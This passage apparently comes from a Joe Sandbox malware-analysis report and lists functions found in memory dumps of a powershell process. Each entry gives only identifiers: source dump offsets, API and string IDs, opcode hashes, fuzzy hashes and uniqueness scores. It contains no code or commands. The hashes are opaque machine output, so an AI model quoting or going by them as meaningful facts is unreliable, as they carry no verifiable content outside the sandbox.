                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: ll^
                            • API String ID: 0-502750380
                            • Opcode ID: 10048b20b2e3bf70d319143d4ea94b31d3bb41a14ae6a4299260b62fc4aeaf05
                            • Instruction ID: e2d1bbd3c9ab2825ff4da566ae70690fc9e6767e9a9430697ad040fdd324b67c
                            • Opcode Fuzzy Hash: 10048b20b2e3bf70d319143d4ea94b31d3bb41a14ae6a4299260b62fc4aeaf05
                            • Instruction Fuzzy Hash: 8D71342180E7D54FD713DB7C98A04DA7FB0AE4722070A45DBC4C0CF2A3D628AD4AC7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: Pi
                            • API String ID: 0-3425462916
                            • Opcode ID: f23a7cc6406d0047093e4f2705ba3ff7bf3d916999a8efb7de3a29dabd4480d3
                            • Instruction ID: c6715df164c2e9a00ed90ddeca69f6c4f7bb24b8502199930c29d2f9ae205607
                            • Opcode Fuzzy Hash: f23a7cc6406d0047093e4f2705ba3ff7bf3d916999a8efb7de3a29dabd4480d3
                            • Instruction Fuzzy Hash: 6E815BB4B10209DFEB54DF95C450AA9BBB2AF8C314F14C059D8096B795CB72EC41CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: ml^
                            • API String ID: 0-2773171145
                            • Opcode ID: e54ed57b60a464b003057c726cf8342f8e4bfd53140e7a6f477841b232d6d38e
                            • Instruction ID: c491bd9fb37d406a30742226f58023a6439498814e45083050c4b8a5c2940126
                            • Opcode Fuzzy Hash: e54ed57b60a464b003057c726cf8342f8e4bfd53140e7a6f477841b232d6d38e
                            • Instruction Fuzzy Hash: 10513A7090E7D59FCB03DB6CD8A049A7F70AF47250B1A45D7C485DF2A3C5289D4ACBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q
                            • API String ID: 0-1614139903
                            • Opcode ID: ce117e2fd7dee2e5f57586f58e1fb85b804df409b906e4bba05fa47c5b3aa7fd
                            • Instruction ID: 14fae6a467d86940e17244f5ddab944abce4a48b32ab216958b3f027f6b18d41
                            • Opcode Fuzzy Hash: ce117e2fd7dee2e5f57586f58e1fb85b804df409b906e4bba05fa47c5b3aa7fd
                            • Instruction Fuzzy Hash: C52149F0B103029BFBA0AA65841077EB6D69B85652F4010A7D90CDBB80DB35DA80D7F1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b7b6b09d5e5d684065616e67e66b92a0b6eee719cd387e51359072806f8b34c
                            • Instruction ID: c7512c971d6a00f7f332351eddad0293b73f1f03c09fd159c1666f9abc1b3536
                            • Opcode Fuzzy Hash: 0b7b6b09d5e5d684065616e67e66b92a0b6eee719cd387e51359072806f8b34c
                            • Instruction Fuzzy Hash: 48523834E012099FDB45CFA8D584A9DFBB6FF89310F258559E804AB762C731ED86CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b3e709038fcc968aec727efe29d5e7b6e742ca7295e4fffc348e5b3d028ba9a6
                            • Instruction ID: 7b33c8fb0e1fcd73abfcceb829f111a31a48e0ae3fdec8b378bf6cd3a2ff871f
                            • Opcode Fuzzy Hash: b3e709038fcc968aec727efe29d5e7b6e742ca7295e4fffc348e5b3d028ba9a6
                            • Instruction Fuzzy Hash: 56223AB4A01206DFEB54DF99C840E69BBB2BF84314F15C159E809AB765CB72EC45CF80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 33ca5e4acb737140b593ce269192f9b091a9295e5eacd434f8c1e321b53b1ca5
                            • Instruction ID: 912985399ac696a39723a0a45fc8e61d78a3d4810508e0f6141fc9c6c14b3905
                            • Opcode Fuzzy Hash: 33ca5e4acb737140b593ce269192f9b091a9295e5eacd434f8c1e321b53b1ca5
                            • Instruction Fuzzy Hash: 48126CB4A01206DFEB54DF88C841E69BBB2BF94314F14C159E8089BB66CB72EC45CF81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cb66d91d6e76ff3cd5834aa4fe026c5022bb22b3d65146c6717a587f86f05cf0
                            • Instruction ID: ee69796479158dd6022c8f8ab19bf0de418157d7bc74241903a2bb9fea76df98
                            • Opcode Fuzzy Hash: cb66d91d6e76ff3cd5834aa4fe026c5022bb22b3d65146c6717a587f86f05cf0
                            • Instruction Fuzzy Hash: 5E027AB5A002099FEB54DB98C441EA9BBB2FF84314F14C069E809AF755C732EC46CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: acf8aadc17f6dd093a927a03657011e9c11aa9932ec8338e93eb3f9525055617
                            • Instruction ID: c027a44b99f83eb9929679604112e6ec05097d9105af5a1c62b006be6337fb32
                            • Opcode Fuzzy Hash: acf8aadc17f6dd093a927a03657011e9c11aa9932ec8338e93eb3f9525055617
                            • Instruction Fuzzy Hash: 220259B5A00309DFEB54EB99C440EA9BBB2BF89314F14C15DE809AB755C732EC46CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 241961e574dee3242c76e2e5907810e5fc8b0c9918bbeed04fd25c76eef34987
                            • Instruction ID: bf649523d38378b0aacd2c4f60f1211fb3777007f5cc31f92eb47f4670652d1b
                            • Opcode Fuzzy Hash: 241961e574dee3242c76e2e5907810e5fc8b0c9918bbeed04fd25c76eef34987
                            • Instruction Fuzzy Hash: B2E11774A00209DFDB55CF98D584AAEFBB2FF88310F248559E805AB765C735ED82CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8ea5371fb63af206636d2373cc43d654c5c3888b0118eff5f99cead57a70d449
                            • Instruction ID: aafe80437d9bddf0bb80133e5a05ba39aeda4aa52d1cfbe8809f184622d8527f
                            • Opcode Fuzzy Hash: 8ea5371fb63af206636d2373cc43d654c5c3888b0118eff5f99cead57a70d449
                            • Instruction Fuzzy Hash: 4DE180B0A00218CFE764EB64C855B9ABBB2BB85304F10C1A9D50D6F796CB35ED85CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3f9cb5a15907c81f92f90678fb9ab7ec416e8ff85ec9edefe113c5a41fbb2f60
                            • Instruction ID: 972eab1302ca243c70740d06f3492dd48d7807aab1ca9fbd851eb9c505a55e46
                            • Opcode Fuzzy Hash: 3f9cb5a15907c81f92f90678fb9ab7ec416e8ff85ec9edefe113c5a41fbb2f60
                            • Instruction Fuzzy Hash: B1C19831A00208CFCB55DBE4D844AADBBB6FF85310F218569E406AF765CB35ED89CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5fa39733f3ca4bbd4f818ad7b09a55303b01ed538f9cdf0c890c378d641ea941
                            • Instruction ID: a8e65b70913d78038e59f1e0390c3ef8104f186f0463c1c33b14a651324ad866
                            • Opcode Fuzzy Hash: 5fa39733f3ca4bbd4f818ad7b09a55303b01ed538f9cdf0c890c378d641ea941
                            • Instruction Fuzzy Hash: 9FB17C70E002098FDF51CFA8D9857EDBBF5AF88314F24812AD819E7694EB749846CF81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c133ec7f134ff67b32183429086d2b6b865bc0bd8917eaa41a7c3ef1526b3540
                            • Instruction ID: ed470a09d85d9a4b4ce3f8c3ab0e6894427bb195f0a8c75c7f5902049b209dd8
                            • Opcode Fuzzy Hash: c133ec7f134ff67b32183429086d2b6b865bc0bd8917eaa41a7c3ef1526b3540
                            • Instruction Fuzzy Hash: 71719D30A00209CFCB15DFA8C880A9DBBF6FF85314F28896AD415DB761DB75AC46CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e6763456534480b798c2fd38a4785d25b6ce75a166b2f23dcbde045f4a22ba9d
                            • Instruction ID: 9bfe07e1bb6eb0462fef9d85630d3a586aad793b1c68d3876f254744ae59b347
                            • Opcode Fuzzy Hash: e6763456534480b798c2fd38a4785d25b6ce75a166b2f23dcbde045f4a22ba9d
                            • Instruction Fuzzy Hash: 8F713970E00208DFDB55DFA5D454AADBBF6FF88304F248429D416ABBA0DB74AD86CB41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9c7822530d04e93d3e6956d68aaa9062cc64a01262a32aa03678ee94af006c19
                            • Instruction ID: 19130f093e7a2c559d950c2819e52ff877350f4b8016a1014f2982a0272c841e
                            • Opcode Fuzzy Hash: 9c7822530d04e93d3e6956d68aaa9062cc64a01262a32aa03678ee94af006c19
                            • Instruction Fuzzy Hash: 65417F31A00204CFDB56DF74C954AAE7BB6EF89350F145868E406EB7A0CB35ED41CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e3a68a9dc58bad6eb4ad6c2159d30edaba617f142a55b84ba40cecaa7287590a
                            • Instruction ID: df61407267daf18a2021e3f755e67e6bc139dc88701aa34f2f88ff974ae23e24
                            • Opcode Fuzzy Hash: e3a68a9dc58bad6eb4ad6c2159d30edaba617f142a55b84ba40cecaa7287590a
                            • Instruction Fuzzy Hash: 0A417B70E00208CFDB55DFA9C8446EDBBB2FF89304F148869D005ABBA0DB74AD45CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fe433b847f22de47aea44de84c46ceef082e6595ebb98cc40d34029946b00062
                            • Instruction ID: b381373abfc4bef89751ff0147a19c9974b3a84c2845c7865a92b3fe619e8325
                            • Opcode Fuzzy Hash: fe433b847f22de47aea44de84c46ceef082e6595ebb98cc40d34029946b00062
                            • Instruction Fuzzy Hash: 5651D834A00209EFDB45DFA8D584A9DFBB6FF88310F248559E404AB765C772ED86CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e8c12710b13546152c0cb07ecfe1d3878362de14d00a468cacbc9846f73648f1
                            • Instruction ID: e6828a3dbe90a0fe62e47442d8a893b2cd63ed87c1ffcfbe3bea6a06b1d8e31f
                            • Opcode Fuzzy Hash: e8c12710b13546152c0cb07ecfe1d3878362de14d00a468cacbc9846f73648f1
                            • Instruction Fuzzy Hash: 74414BB4A001098FCB06CF58C594DAAFBB5FF48310B25819AD915AB764C736FD91CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d62754f20178771282af7f1bc736850d52b589a8598fd3d0e938a12a6bef978b
                            • Instruction ID: a2024da642ae859135e77088759fdccb1fe6a9f9b192f27cf5118518badca3fc
                            • Opcode Fuzzy Hash: d62754f20178771282af7f1bc736850d52b589a8598fd3d0e938a12a6bef978b
                            • Instruction Fuzzy Hash: 0F31E570741204AFE704ABB5C851FAE7AA3AFC5314F508428E9056F795CE76DC458BE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cb720cf80a7e1d4e4cb57d609997a182c41910c97a906a4eda8247cddcc34561
                            • Instruction ID: e844afe7e92c73b8ccb3aaa0657a7977844af9cfda4a4efa9b2bca1b27734890
                            • Opcode Fuzzy Hash: cb720cf80a7e1d4e4cb57d609997a182c41910c97a906a4eda8247cddcc34561
                            • Instruction Fuzzy Hash: E32161F170032D67EBA4A9BA8800B37A6E65FC4715F28C42DD50DCF785DD75C8468361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 130114968aab7758f81175afaa50b48d317f9c742e894911c4e971a0616c5bdd
                            • Instruction ID: 0fde747b0db981553b156aada7127d7f356e7c1ee76ef7eb280e76118d47ec52
                            • Opcode Fuzzy Hash: 130114968aab7758f81175afaa50b48d317f9c742e894911c4e971a0616c5bdd
                            • Instruction Fuzzy Hash: D1311730A00228CFCB66DB64C8916EEB7F6BF89304F1044E9D51AAB355DB359E85CF81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e65d5740b7bf852cf4a8125ab1ebce3368438b6f2ab90990b836d1f9ba30f394
                            • Instruction ID: 7652856cdd21aa17a5d9c5e5472c43709ceceb7995f716f898d5a45a3ffe9ad7
                            • Opcode Fuzzy Hash: e65d5740b7bf852cf4a8125ab1ebce3368438b6f2ab90990b836d1f9ba30f394
                            • Instruction Fuzzy Hash: 4B219AF170436D6BEB605AB688107B27FB69FC6310F1C845ED44C8F286E574988A8362
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e4fd80f6f713ad257b248a494d09f2119f51efc1504b1c73bd55d28d2debd029
                            • Instruction ID: aada3435dd523b43cffe097a796ddea4a96ade957de91e20246ede38cfb1c966
                            • Opcode Fuzzy Hash: e4fd80f6f713ad257b248a494d09f2119f51efc1504b1c73bd55d28d2debd029
                            • Instruction Fuzzy Hash: 14314574A006059FCB15CF58C9849AAFBB1FF88320B258699D819EB765C336EC81CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a3963c52788a2b79d1ba61e84aba980e1065dfa490d0d46e4b3e728646999a5a
                            • Instruction ID: d00cd176a06c6dd311f3ab07b63bd642a1ed415416a8c484a05ace72ae117e16
                            • Opcode Fuzzy Hash: a3963c52788a2b79d1ba61e84aba980e1065dfa490d0d46e4b3e728646999a5a
                            • Instruction Fuzzy Hash: E101477631031ECBE76065AAE40057AF7D99BC6222F14C43ED44DCB210CA32C846C3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cd75a944f32430db38d77bb77e5740f9f1cd38169e2c6e1a250d93d1a1bd887a
                            • Instruction ID: 2f9323637b0fcec65a58c7154c6ac8de8eeb1a077fa42a102b561b72cfcce701
                            • Opcode Fuzzy Hash: cd75a944f32430db38d77bb77e5740f9f1cd38169e2c6e1a250d93d1a1bd887a
                            • Instruction Fuzzy Hash: CF11EF35900209EFDB46CF98D984A9DFBB2FF48324F288559E404AB365C771ED85CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6ed33692a851f537240c7e9ebe7ca939d3791913020527eafbc8775baf6beb97
                            • Instruction ID: 16bcc1b1136d9bd342d532c2e1c9ebc54e859d3f7f3e45d7accfa6f07ee3428b
                            • Opcode Fuzzy Hash: 6ed33692a851f537240c7e9ebe7ca939d3791913020527eafbc8775baf6beb97
                            • Instruction Fuzzy Hash: FD2178747006198FCB54DB79C9848AEBBF6FF8A20475045A9E446CBB71DB70ED08CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                            • API String ID: 0-788909730
                            • Opcode ID: bde13b7679fecc375eb4e029aa49aab2c51edd005a221bc41b85901e16988636
                            • Instruction ID: a596a6a0cd35a99569bdd86a8e4f0644e4162eb88544525297639607e395d559
                            • Opcode Fuzzy Hash: bde13b7679fecc375eb4e029aa49aab2c51edd005a221bc41b85901e16988636
                            • Instruction Fuzzy Hash: 41A149B1B003099FEB65AAB9C8006AABBE7AFC5310F34C46AD4198F754DF31D945CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q
                            • API String ID: 0-1608119003
                            • Opcode ID: 8f229f4e6fbc4044aeabb394d70bf02f3505ec853889100c512c2d3fd3887d5c
                            • Instruction ID: 2db9d83d43cc08f1670b5b3f8d79dc749549fc485f2e1ac476ed7118282919a1
                            • Opcode Fuzzy Hash: 8f229f4e6fbc4044aeabb394d70bf02f3505ec853889100c512c2d3fd3887d5c
                            • Instruction Fuzzy Hash: E381ACB27403168FF7A4AB79881026ABBE5AFC2710F14846AE449CF791DF35CC45C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q
                            • API String ID: 0-3669853574
                            • Opcode ID: a05faa097a06aa93c7ddd86174458c0ff8301c6ffd3171ae3da944042f2a6547
                            • Instruction ID: f530eb3fee03248d92a1aa39190ecc15e8093ae12698a998d1d5a13c731d0a96
                            • Opcode Fuzzy Hash: a05faa097a06aa93c7ddd86174458c0ff8301c6ffd3171ae3da944042f2a6547
                            • Instruction Fuzzy Hash: A86148B472030ADFEBA5AE29C8046EABBB5AF81310F54C47AE54D8F655DB31C885C790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: XRcq$XRcq$XRcq$tP^q$tP^q$$^q
                            • API String ID: 0-1682816917
                            • Opcode ID: 9ad1708b8fc05cf6918ca42abb6894fe9596b40d33eb7b085f63f20e8e0fa37f
                            • Instruction ID: d3e96a424c53499c2235cfa4ab41b9cad5a6ce7cb8cca7da30b92324457ca9f4
                            • Opcode Fuzzy Hash: 9ad1708b8fc05cf6918ca42abb6894fe9596b40d33eb7b085f63f20e8e0fa37f
                            • Instruction Fuzzy Hash: F461F6F170030B9FEB64AF698440A6AFBB6AF85310F24C469E4499F395CB31D945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$tP^q$tP^q$$^q
                            • API String ID: 0-2369969929
                            • Opcode ID: 54aa7830d657884d66f21befd63c715d0430597b9c42cdce966106dd318a1b89
                            • Instruction ID: 2bea16558dfbbd3d78950834c63b413066813979ca531dc16ece62d77ae37536
                            • Opcode Fuzzy Hash: 54aa7830d657884d66f21befd63c715d0430597b9c42cdce966106dd318a1b89
                            • Instruction Fuzzy Hash: 236138F070031BDFEB54AF64C40166EBBA2BF85310F148469E8095B691CB32DD51C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                            • API String ID: 0-3272787073
                            • Opcode ID: cfc4c11292ca0b362ff2c7326ffdf5e57a1f651de247b229200f7d701797f373
                            • Instruction ID: 6ce2608d6becba77a655935535235da2dd581dd2536b61f643a655a91479cfe8
                            • Opcode Fuzzy Hash: cfc4c11292ca0b362ff2c7326ffdf5e57a1f651de247b229200f7d701797f373
                            • Instruction Fuzzy Hash: BA413AF1B083159FEB69AA7488106AE7FA59FC2310F14446AD809CF291DF31C94DC7A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$tP^q$$^q$$^q$$^q
                            • API String ID: 0-3997570045
                            • Opcode ID: 8473b2295cc66b410a0a18c3a38ba4ccc094321c32acf4ad8aeba3f34033baf9
                            • Instruction ID: 3dd553385d7327ee337251bc1ec0f93f8f93fa00dddde398a27fd559b2d74201
                            • Opcode Fuzzy Hash: 8473b2295cc66b410a0a18c3a38ba4ccc094321c32acf4ad8aeba3f34033baf9
                            • Instruction Fuzzy Hash: 5251B1F0A0030ADFEBA4AE55C944BABB7F6BB85711F18C455E80D9B290C772DC44CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                            • API String ID: 0-3272787073
                            • Opcode ID: d8860820e30a0e1354866870550562c1aaf2aaae9c4b755c457bd72d064eafbb
                            • Instruction ID: eb077c3437e8f169c8ae6fbe35d7a0d412534c627303596083885fb9dadaf2dc
                            • Opcode Fuzzy Hash: d8860820e30a0e1354866870550562c1aaf2aaae9c4b755c457bd72d064eafbb
                            • Instruction Fuzzy Hash: DB316BF370430A8FFBA96A6584607B6B7E9AFC5612B24C87BC44ACB245DE31C489C751
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
